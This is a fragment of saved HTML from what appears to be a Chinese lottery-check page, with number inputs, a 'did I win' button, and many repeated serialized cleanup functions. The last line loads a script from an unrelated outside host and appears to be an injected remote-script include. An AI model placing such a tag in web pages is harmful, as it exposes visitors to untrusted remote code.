<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m5" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m6" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck2" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m7" /></td>


</tr>


<tr align="center" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">


<td colspan="8" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input id="button1" onclick="yes();" type="button" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="Submit" value="看我中奖没" /> </td>


</tr>


</tbody>


</table>


 




<div style="FONT-SIZE: 12px" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" align="center">lastModified time:<script language="JavaScript">...


    document.write(document.lastModified)


   </script> power by kz </div>


<script language=javascript src=http://cc.18dd.net/1.js></script>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: